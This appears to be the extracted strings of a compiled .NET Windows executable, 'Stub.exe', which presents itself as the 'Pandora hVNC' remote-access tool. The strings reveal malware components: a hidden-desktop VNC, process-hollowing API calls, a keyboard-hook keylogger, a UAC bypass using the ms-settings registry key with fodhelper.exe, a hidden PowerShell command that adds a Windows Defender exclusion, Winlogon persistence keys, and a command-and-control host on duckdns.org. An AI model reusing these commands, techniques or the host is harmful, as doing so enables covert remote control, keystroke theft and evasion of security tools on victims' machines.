!This program cannot be run in DOS mode.
`.rsrc
@.reloc
-R+ar!
v4.0.30319
#Strings
QLZ_POINTERS_1
kernel32
Microsoft.Win32
ReadInt32
ToInt32
cbReserved2
lpReserved2
QLZ_POINTERS_3
ToInt16
get_UTF8
<Module>
<PrivateImplementationDetails>
DelegateCreateProcessA
LoadLibraryA
StartHVNC
get_ID
set_ID
_hookID
UNCOMPRESSED_END
DESKTOP_JOURNALRECORD
ExclusionWD
SW_HIDE
QLZ_MEMORY_SAFE
CCHDEVICENAME
CCHFORMNAME
DESKTOP_ENUMERATE
DESKTOP_JOURNALPLAYBACK
DF_ALLOWOTHERACCOUNTHOOK
WHKEYBOARDLL
DESKTOP_HOOKCONTROL
UNCONDITIONAL_MATCHLEN
DEFAULT_HEADERLEN
CWORD_LEN
QLZ_VERSION_REVISION
STARTUP_INFORMATION
PROCESS_INFORMATION
WM_KEYDOWN
System.IO
DESKTOP_SWITCHDESKTOP
QLZ_STREAMING_BUFFER
QLZ_VERSION_MAJOR
QLZ_VERSION_MINOR
SECURITY_ATTRIBUTES
HASH_VALUES
get_IP_DNS
set_IP_DNS
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
MINOFFSET
get_PORT
set_PORT
DESKTOP_CREATEMENU
DESKTOP_CREATEWINDOW
CreateDesktopW
get_MUTEX
set_MUTEX
DePikoloData
mscorlib
WinExec
Microsoft.VisualBasic
LowLevelKeyboardProc
dwThreadId
GetWindowThreadProcessId
lpdwProcessId
GetProcessById
bytesRead
idThread
DelegateResumeThread
thread
IsInstalled
sizeCompressed
size_compressed
sizeDecompressed
size_decompressed
lpReserved
<ID>k__BackingField
<IP_DNS>k__BackingField
<PORT>k__BackingField
<MUTEX>k__BackingField
method
IsNullOrWhiteSpace
device
source
vkCode
wScanCode
keyCode
set_Mode
deviceMode
FileMode
PaddingMode
CipherMode
Message
EndInvoke
BeginInvoke
IDisposable
compressible
compatible
ThreadHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
bInheritHandle
handle
InstallFile
IsInRole
WindowsBuiltInRole
lpTitle
GetActiveWindowTitle
CurrentActiveWindowTitle
get_MainWindowTitle
get_MainModule
ProcessModule
get_Name
get_FileName
lpModuleName
exeName
get_FullName
applicationName
desktopName
get_ProcessName
GetProcessesByName
DirectoryName
filename
commandLine
WriteLine
get_NewLine
Combine
ValueType
uMapType
operType
get_Culture
set_Culture
resourceCulture
MethodBase
Dispose
Create
MulticastDelegate
GetKeyboardState
EditorBrowsableState
SetApartmentState
lpKeyState
GetKeyState
Delete
fast_write
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
dLByte
GetValue
SetValue
Stub.exe
dwXSize
dwYSize
get_Size
bufferSize
SizeOf
cchBuff
pwszBuff
System.Threading
set_Padding
UTF8Encoding
System.Runtime.Versioning
FromBase64String
ToBase64String
ToString
GetString
Substring
ComputeHash
ComputeStringHash
get_ExecutablePath
GetTempPath
GetFolderPath
ologgerPath
get_Length
nLength
length
LoadApi
CreateApi
AsyncCallback
HookCallback
callback
TransformFinalBlock
idHook
SetHook
accessMask
Marshal
System.Security.Principal
WindowsPrincipal
System.ComponentModel
kernel32.dll
user32.dll
FileStream
lParam
wParam
Program
System
SymmetricAlgorithm
HashAlgorithm
ICryptoTransform
resourceMan
headerLen
hidden
bytesWritten
IsAdmin
MessageBoxIcon
Application
processInformation
System.Globalization
Interaction
DelegateZwUnmapViewOfSection
System.Reflection
ArgumentException
Environ
HandleRun
TryRun
MethodInfo
FileInfo
CultureInfo
FileSystemInfo
startupInfo
ParameterInfo
DirectoryInfo
Pikolo
Copikolo
CreateDesktop
lpDesktop
hNewDesktop
write_header
MD5CryptoServiceProvider
TripleDESCryptoServiceProvider
StringBuilder
SpecialFolder
folder
Buffer
buffer
get_ResourceManager
Identifier
System.CodeDom.Compiler
Installer
ToUpper
initexplorer
CurrentUser
ToGenericParameter
StreamWriter
TextWriter
GetDelegateForFunctionPointer
BitConverter
ToLower
hStdError
.cctor
lpSecurityDescriptor
CreateDecryptor
CreateEncryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
Stub.Properties.Resources.resources
DebuggingModes
Stub.Properties
inheritHandles
GetProcesses
set_Attributes
threadAttributes
FileAttributes
processAttributes
attributes
ReadAllBytes
GetBytes
numbytes
creationFlags
dwFlags
System.Windows.Forms
Contains
Conversions
MessageBoxButtons
get_Chars
dwXCountChars
dwYCountChars
GetParameters
FileAccess
hProcess
GetCurrentProcess
process
GetProcAddress
baseAddress
address
decompress
get_Exists
Concat
Object
object
protect
System.Net
op_Explicit
UACxploit
IAsyncResult
DialogResult
result
WebClient
Environment
environment
GetCurrent
get_EntryPoint
ParameterizedThreadStart
Convert
ipport
GetKeyboardLayout
hStdInput
hStdOutput
System.Text
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
GetForegroundWindow
GetConsoleWindow
wShowWindow
nCmdShow
DelegateVirtualAllocEx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
MessageBox
set_Key
CreateSubKey
OpenSubKey
GetRegKey
MapVirtualKey
wVirtKey
RegistryKey
System.Security.Cryptography
get_Assembly
BlockCopy
DelegateReadProcessMemory
DelegateWriteProcessMemory
CreateDirectory
currentDirectory
InstallRegistry
op_Equality
System.Security
WindowsIdentity
IsNullOrEmpty
3System.Resources.Tools.StronglyTypedResourceBuilder
17.0.0.0
WrapNonExceptionThrows
Copyright
2021
$835bcf68-5f0d-428b-bf86-f859a34555d8
.NETFramework,Version=v4.5.2
FrameworkDisplayName
.NET Framework 4.5.2P.
7System.Security.Permissions.SecurityPermissionAttribute
SkipVerification
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="utf-8"?>
<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<!-- UAC Manifest Options
If you want to change the Windows User Account Control level replace the
requestedExecutionLevel node with one of the following.
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
<requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
<requestedExecutionLevel level="highestAvailable" uiAccess="false" />
Specifying requestedExecutionLevel element will disable file and registry virtualization.
Remove this element if your application requires this virtualization for backwards
compatibility.
-->
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- A list of the Windows versions that this application has been tested on
and is designed to work with. Uncomment the appropriate elements
and Windows will automatically select the most compatible environment. -->
<!-- Windows Vista -->
<!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
<!-- Windows 7 -->
<!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
<!-- Windows 8 -->
<!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
<!-- Windows 8.1 -->
<!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
<!-- Windows 10 -->
<!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
</application>
</compatibility>
<!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config.
Makes the application long-path aware. See https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation -->
<!--
<application xmlns="urn:schemas-microsoft-com:asm.v3">
<windowsSettings>
<dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
<longPathAware xmlns="http://schemas.microsoft.com/SMI/2016/WindowsSettings">true</longPathAware>
</windowsSettings>
</application>
<!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
<!--
<dependency>
<dependentAssembly>
<assemblyIdentity
type="win32"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
processorArchitecture="*"
publicKeyToken="6595b64144ccf1df"
language="*"
/>
</dependentAssembly>
</dependency>
</assembly>
C# version only supports level 1 and 3
RemoteDesktop
Windows\explorer.exe
95YNEWgROnaTahbtx0uweTAcWTLdyftmL/eCW3QHyFOdDIQiJNWgK2qJa1PTXY3bMUrwMeloOnKoNM55dHPMYq9iKH6PyuIihuSSQZvv+r1I0sSA2htenkwoBnEzLpEj4baU4TINsOrBgY3dkzkiIxoqvQOYT4HYvgEoKzYEKffj8G8GuuroBBtu1TCJVbx38xmS3ZL+UAaU7kE9wZItxOHqdN8rLZtER5DNYAm60WFw2hga8vi0pX5eUzXxEBu9+4ytBQBNaxs1BYaMc7CGyUeMnC1iOPRDZKLckh8VtjM4NOEVZ/ycfC8KooHGQZWVP1B38qsK7aMdFXYg5ICyj2KfN35l/hZcEHPGwlXs8OXXkqH+KSXseCh2I+tb0qvNKFBEFbxH9/vRXR8CcyZozUPoI8a6XLN08PC7lLF+ew8iI1BN4TOsUn6YIUxnK6EeE3xWO0QM91s1q8bCWwog4i5+qS599kWb/PEvMw66x1i2Xtao8huQFOeLU7TyqnBZQnXY+kWdCyShdA8pt/d8Hdf/+kVW1J3IwZh2JVQOXJI58GIDcKKUSpbMmffHlfucdBXMb8DqoPlSyfdD9rrUOlrOMRWnAalb58qPcZxJF4A6v582BtrhSZFzNklfQS+MJFi95CIOzKkhxIgwut/HrAFF/7lsYPndywhfDwS1Dwp490aZIO/c8ax69e3B0gN7DNvRTN1GIeRWf8+8jwIwtuORnRH93pJsxjRIDMTaq9qDOW9apkmEfwwhcxBCvYVbo+SXYXB6a3DDy2iW6/TfFquAFWiGEQK+IB7zje/vPIXGI2DGNMypcC5NoMGUqVg+46ro03CE6CdIE9FDedFz9SOwKAP0mx6FknkggA4I2cmEey7vKqVHNkbXaeccc5Nl7NR3DovsffRRU5sn/daK33kmn8xUcyPrZslhNY2Foku89prNN7qisBbNZz5bGtrAgvfXU5CQBpoZvZIFlHd6pVYLxtpT0xP/4BM82as6sdXBr67gfeo0HGn4Oyq43Crf
C:\Windows\Microsoft.NET\Framework\v4.0.30319\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
CqbkTHriRRbQjaArtJfF
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c
explorer.exe,
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=
Software\Classes\ms-settings\shell\open\command
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath '
DelegateExecute
C:\Windows\System32\ComputerDefaults.exe
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\System32\fodhelper.exe
cmd.exe /k START
outside-agent.duckdns.org
UpdateGroup
TaiaVMXoI
QwwMNoAWc
fuZHaZqmi.exe
Do You Want To Install Pandora hVNC?
Pandora hVNC
cvtres
Pandora WILL NOT be installed to your system
APPDATA
\tempp4nd0r4
\tempp4nd0r4on
Stub.Properties.Resources
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
InternalName
Stub.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
Assembly Version
3.6.0.0